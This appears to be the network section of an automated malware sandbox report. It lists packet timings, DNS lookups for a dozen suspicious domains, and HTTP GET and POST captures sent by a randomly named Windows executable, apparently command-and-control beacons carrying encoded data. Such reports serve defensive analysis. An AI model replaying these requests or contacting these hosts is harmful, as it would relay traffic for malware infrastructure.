                                                                                      Nov 24, 2024 08:12:34.534307003 CET8050042104.21.42.77192.168.2.4
                                                                                      Nov 24, 2024 08:12:34.537496090 CET5004280192.168.2.4104.21.42.77
                                                                                      Nov 24, 2024 08:12:34.569503069 CET5004280192.168.2.4104.21.42.77
                                                                                      Nov 24, 2024 08:12:34.689295053 CET8050042104.21.42.77192.168.2.4
                                                                                      Nov 24, 2024 08:12:35.944679022 CET8050042104.21.42.77192.168.2.4
                                                                                      Nov 24, 2024 08:12:35.944747925 CET8050042104.21.42.77192.168.2.4
                                                                                      Nov 24, 2024 08:12:35.945611954 CET8050042104.21.42.77192.168.2.4
                                                                                      Nov 24, 2024 08:12:35.945885897 CET5004280192.168.2.4104.21.42.77
                                                                                      Nov 24, 2024 08:12:35.949496031 CET5004280192.168.2.4104.21.42.77
                                                                                      Nov 24, 2024 08:12:36.069036007 CET8050042104.21.42.77192.168.2.4
                                                                                      Nov 24, 2024 08:12:41.725333929 CET5004380192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:41.845005989 CET8050043172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:41.845103979 CET5004380192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:41.862071991 CET5004380192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:41.981672049 CET8050043172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:43.368138075 CET5004380192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:43.488038063 CET8050043172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:43.488102913 CET5004380192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:44.388727903 CET5004480192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:44.508301020 CET8050044172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:44.508572102 CET5004480192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:44.523943901 CET5004480192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:44.643531084 CET8050044172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:46.040088892 CET5004480192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:46.160085917 CET8050044172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:46.163781881 CET5004480192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:47.060038090 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:47.179564953 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.179667950 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:47.202282906 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:47.321924925 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.321944952 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322057962 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322093010 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322218895 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322232962 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322279930 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322307110 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:47.322359085 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:48.715939045 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:48.821084976 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:48.822192907 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:48.824199915 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:48.824199915 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:48.835684061 CET8050045172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:48.840004921 CET5004580192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:49.731858969 CET5004680192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:49.851383924 CET8050046172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:49.851469994 CET5004680192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:49.863296032 CET5004680192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:49.982877016 CET8050046172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:51.492211103 CET8050046172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:51.493390083 CET8050046172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:51.493441105 CET5004680192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:51.495502949 CET5004680192.168.2.4172.67.168.228
                                                                                      Nov 24, 2024 08:12:51.614918947 CET8050046172.67.168.228192.168.2.4
                                                                                      Nov 24, 2024 08:12:57.125539064 CET5004780192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:57.245028973 CET8050047194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:57.245187044 CET5004780192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:57.261665106 CET5004780192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:57.381109953 CET8050047194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:58.667351961 CET8050047194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:58.667390108 CET8050047194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:58.667402983 CET8050047194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:58.667418003 CET8050047194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:58.667448044 CET5004780192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:58.667512894 CET5004780192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:58.775583029 CET5004780192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:59.794177055 CET5004880192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:59.913624048 CET8050048194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:12:59.913798094 CET5004880192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:12:59.929430962 CET5004880192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:00.049213886 CET8050048194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:01.334291935 CET8050048194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:01.334316969 CET8050048194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:01.334328890 CET8050048194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:01.334383965 CET5004880192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:01.334427118 CET8050048194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:01.334496975 CET5004880192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:01.430687904 CET5004880192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:02.449644089 CET5004980192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:02.570218086 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.570502996 CET5004980192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:02.588238955 CET5004980192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:02.707758904 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.707887888 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.707937956 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.708009958 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.708034039 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.708134890 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.708139896 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.708235025 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:02.708256960 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:03.996877909 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:03.996937037 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:03.996944904 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:03.997524977 CET5004980192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:04.121469021 CET8050049194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:04.125524044 CET5004980192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:04.192100048 CET5004980192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:05.200629950 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:05.320235968 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:05.320415020 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:05.331769943 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:05.451273918 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.695780993 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.695863008 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.695931911 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696033001 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696046114 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696046114 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:06.696119070 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:06.696158886 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696229935 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696240902 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696250916 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696274996 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:06.696320057 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:06.696343899 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.696551085 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:06.697087049 CET8050050194.58.112.174192.168.2.4
                                                                                      Nov 24, 2024 08:13:06.697160006 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:07.093847990 CET5005080192.168.2.4194.58.112.174
                                                                                      Nov 24, 2024 08:13:07.213340998 CET8050050194.58.112.174192.168.2.4
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 24, 2024 08:09:48.738868952 CET5316553192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:09:49.466728926 CET53531651.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:10:05.809586048 CET5652053192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:10:06.821046114 CET5652053192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:10:06.911978006 CET53565201.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:10:06.958044052 CET53565201.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:10:21.700572968 CET6396353192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:10:22.711757898 CET6396353192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:10:23.138458014 CET53639631.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:10:23.138540030 CET53639631.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:10:37.903037071 CET5264553192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:10:38.857002020 CET53526451.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:10:53.215893984 CET5826553192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:10:53.693028927 CET53582651.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:11:08.076010942 CET4946753192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:11:09.086733103 CET4946753192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:11:09.214426994 CET53494671.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:11:09.224534035 CET53494671.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:11:23.983711958 CET6108953192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:11:24.977487087 CET6108953192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:11:25.977404118 CET6108953192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:11:26.282562971 CET53610891.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:11:26.282581091 CET53610891.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:11:26.282588959 CET53610891.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:11:41.013704062 CET5278653192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:11:41.430565119 CET53527861.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:11:55.911535025 CET5414153192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:11:56.402055025 CET53541411.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:12:10.668520927 CET5492653192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:12:11.344993114 CET53549261.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:12:25.841737986 CET5368153192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:12:26.197191000 CET53536811.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:12:40.967271090 CET6368053192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:12:41.722187042 CET53636801.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:12:56.513447046 CET6522153192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:12:57.122581959 CET53652211.1.1.1192.168.2.4
                                                                                      Nov 24, 2024 08:13:12.106703997 CET5186253192.168.2.41.1.1.1
                                                                                      Nov 24, 2024 08:13:12.430054903 CET53518621.1.1.1192.168.2.4
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 24, 2024 08:09:48.738868952 CET192.168.2.41.1.1.10x4cfeStandard query (0)www.grandesofertas.funA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:05.809586048 CET192.168.2.41.1.1.10x22cbStandard query (0)www.jijievo.siteA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.821046114 CET192.168.2.41.1.1.10x22cbStandard query (0)www.jijievo.siteA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:21.700572968 CET192.168.2.41.1.1.10x32a7Standard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:22.711757898 CET192.168.2.41.1.1.10x32a7Standard query (0)www.ytsd88.topA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:37.903037071 CET192.168.2.41.1.1.10x9a90Standard query (0)www.bpgroup.siteA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:53.215893984 CET192.168.2.41.1.1.10x9aa4Standard query (0)www.fortevision.xyzA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:08.076010942 CET192.168.2.41.1.1.10x2532Standard query (0)www.rtpterbaruwaktu3.xyzA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:09.086733103 CET192.168.2.41.1.1.10x2532Standard query (0)www.rtpterbaruwaktu3.xyzA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:23.983711958 CET192.168.2.41.1.1.10xf5d8Standard query (0)www.prhmcjdz.tokyoA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:24.977487087 CET192.168.2.41.1.1.10xf5d8Standard query (0)www.prhmcjdz.tokyoA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:25.977404118 CET192.168.2.41.1.1.10xf5d8Standard query (0)www.prhmcjdz.tokyoA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:41.013704062 CET192.168.2.41.1.1.10x1650Standard query (0)www.connecty.liveA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:55.911535025 CET192.168.2.41.1.1.10x58eeStandard query (0)www.tals.xyzA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:10.668520927 CET192.168.2.41.1.1.10x9316Standard query (0)www.50food.comA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:25.841737986 CET192.168.2.41.1.1.10x1f7fStandard query (0)www.zriaraem-skiry.sbsA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:40.967271090 CET192.168.2.41.1.1.10x6634Standard query (0)www.nmgzjwh.netA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:56.513447046 CET192.168.2.41.1.1.10x7c56Standard query (0)www.sklad-iq.onlineA (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:13:12.106703997 CET192.168.2.41.1.1.10x7507Standard query (0)www.supernutra01.onlineA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 24, 2024 08:09:49.466728926 CET1.1.1.1192.168.2.40x4cfeNo error (0)www.grandesofertas.funentri-domains.clickmax.ioCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 24, 2024 08:09:49.466728926 CET1.1.1.1192.168.2.40x4cfeNo error (0)entri-domains.clickmax.iossl.goentri.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 24, 2024 08:09:49.466728926 CET1.1.1.1192.168.2.40x4cfeNo error (0)ssl.goentri.com76.223.74.74A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:09:49.466728926 CET1.1.1.1192.168.2.40x4cfeNo error (0)ssl.goentri.com13.248.221.243A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.911978006 CET1.1.1.1192.168.2.40x22cbNo error (0)www.jijievo.siteall.wjscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.911978006 CET1.1.1.1192.168.2.40x22cbNo error (0)all.wjscdn.com154.90.58.209A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.911978006 CET1.1.1.1192.168.2.40x22cbNo error (0)all.wjscdn.com154.205.143.51A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.911978006 CET1.1.1.1192.168.2.40x22cbNo error (0)all.wjscdn.com154.205.156.26A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.911978006 CET1.1.1.1192.168.2.40x22cbNo error (0)all.wjscdn.com154.205.159.116A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.911978006 CET1.1.1.1192.168.2.40x22cbNo error (0)all.wjscdn.com38.54.112.227A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.911978006 CET1.1.1.1192.168.2.40x22cbNo error (0)all.wjscdn.com154.90.35.240A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.958044052 CET1.1.1.1192.168.2.40x22cbNo error (0)www.jijievo.siteall.wjscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.958044052 CET1.1.1.1192.168.2.40x22cbNo error (0)all.wjscdn.com154.90.58.209A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.958044052 CET1.1.1.1192.168.2.40x22cbNo error (0)all.wjscdn.com154.205.143.51A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.958044052 CET1.1.1.1192.168.2.40x22cbNo error (0)all.wjscdn.com38.54.112.227A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.958044052 CET1.1.1.1192.168.2.40x22cbNo error (0)all.wjscdn.com154.205.159.116A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.958044052 CET1.1.1.1192.168.2.40x22cbNo error (0)all.wjscdn.com154.205.156.26A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:06.958044052 CET1.1.1.1192.168.2.40x22cbNo error (0)all.wjscdn.com154.90.35.240A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:23.138458014 CET1.1.1.1192.168.2.40x32a7No error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:23.138540030 CET1.1.1.1192.168.2.40x32a7No error (0)www.ytsd88.top47.76.213.197A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:38.857002020 CET1.1.1.1192.168.2.40x9a90No error (0)www.bpgroup.sitebpgroup.siteCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:38.857002020 CET1.1.1.1192.168.2.40x9a90No error (0)bpgroup.site74.48.143.82A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:53.693028927 CET1.1.1.1192.168.2.40x9aa4No error (0)www.fortevision.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:10:53.693028927 CET1.1.1.1192.168.2.40x9aa4No error (0)www.fortevision.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:09.214426994 CET1.1.1.1192.168.2.40x2532No error (0)www.rtpterbaruwaktu3.xyzrtpterbaruwaktu3.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:09.214426994 CET1.1.1.1192.168.2.40x2532No error (0)rtpterbaruwaktu3.xyz103.21.221.87A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:09.224534035 CET1.1.1.1192.168.2.40x2532No error (0)www.rtpterbaruwaktu3.xyzrtpterbaruwaktu3.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:09.224534035 CET1.1.1.1192.168.2.40x2532No error (0)rtpterbaruwaktu3.xyz103.21.221.87A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:26.282562971 CET1.1.1.1192.168.2.40xf5d8No error (0)www.prhmcjdz.tokyoymx01.cnCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:26.282562971 CET1.1.1.1192.168.2.40xf5d8No error (0)ymx01.cn8.210.46.21A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:26.282581091 CET1.1.1.1192.168.2.40xf5d8No error (0)www.prhmcjdz.tokyoymx01.cnCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:26.282581091 CET1.1.1.1192.168.2.40xf5d8No error (0)ymx01.cn8.210.46.21A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:26.282588959 CET1.1.1.1192.168.2.40xf5d8No error (0)www.prhmcjdz.tokyoymx01.cnCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:26.282588959 CET1.1.1.1192.168.2.40xf5d8No error (0)ymx01.cn8.210.46.21A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:41.430565119 CET1.1.1.1192.168.2.40x1650No error (0)www.connecty.live203.161.43.228A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:56.402055025 CET1.1.1.1192.168.2.40x58eeNo error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:11:56.402055025 CET1.1.1.1192.168.2.40x58eeNo error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:11.344993114 CET1.1.1.1192.168.2.40x9316No error (0)www.50food.com147.255.21.187A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:26.197191000 CET1.1.1.1192.168.2.40x1f7fNo error (0)www.zriaraem-skiry.sbs104.21.42.77A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:26.197191000 CET1.1.1.1192.168.2.40x1f7fNo error (0)www.zriaraem-skiry.sbs172.67.159.61A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:41.722187042 CET1.1.1.1192.168.2.40x6634No error (0)www.nmgzjwh.net172.67.168.228A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:41.722187042 CET1.1.1.1192.168.2.40x6634No error (0)www.nmgzjwh.net172.64.171.187A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:12:57.122581959 CET1.1.1.1192.168.2.40x7c56No error (0)www.sklad-iq.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:13:12.430054903 CET1.1.1.1192.168.2.40x7507No error (0)www.supernutra01.online172.67.220.36A (IP address)IN (0x0001)false
                                                                                      Nov 24, 2024 08:13:12.430054903 CET1.1.1.1192.168.2.40x7507No error (0)www.supernutra01.online104.21.24.198A (IP address)IN (0x0001)false
                                                                                      • www.grandesofertas.fun
                                                                                      • www.jijievo.site
                                                                                      • www.ytsd88.top
                                                                                      • www.bpgroup.site
                                                                                      • www.fortevision.xyz
                                                                                      • www.rtpterbaruwaktu3.xyz
                                                                                      • www.prhmcjdz.tokyo
                                                                                      • www.connecty.live
                                                                                      • www.tals.xyz
                                                                                      • www.50food.com
                                                                                      • www.zriaraem-skiry.sbs
                                                                                      • www.nmgzjwh.net
                                                                                      • www.sklad-iq.online
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.44973676.223.74.74804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:09:49.603538990 CET466OUTGET /wu6o/?3vNdCBvX=PAJ2EBywaoPRtAOAuLkHmGqEo3O5GOPxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtCvBZNCCQMFI+vTFboLP2ZRmMaANZD1baSXk=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.grandesofertas.fun
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:09:50.755297899 CET600INHTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:09:50 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 162
                                                                                      Connection: close
                                                                                      Location: https://www.grandesofertas.fun/wu6o/?3vNdCBvX=PAJ2EBywaoPRtAOAuLkHmGqEo3O5GOPxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtCvBZNCCQMFI+vTFboLP2ZRmMaANZD1baSXk=&etx=BXy4elO0X
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449759154.90.58.209804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:10:07.050307989 CET722OUTPOST /z9pi/ HTTP/1.1
                                                                                      Host: www.jijievo.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.jijievo.site
                                                                                      Referer: http://www.jijievo.site/z9pi/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
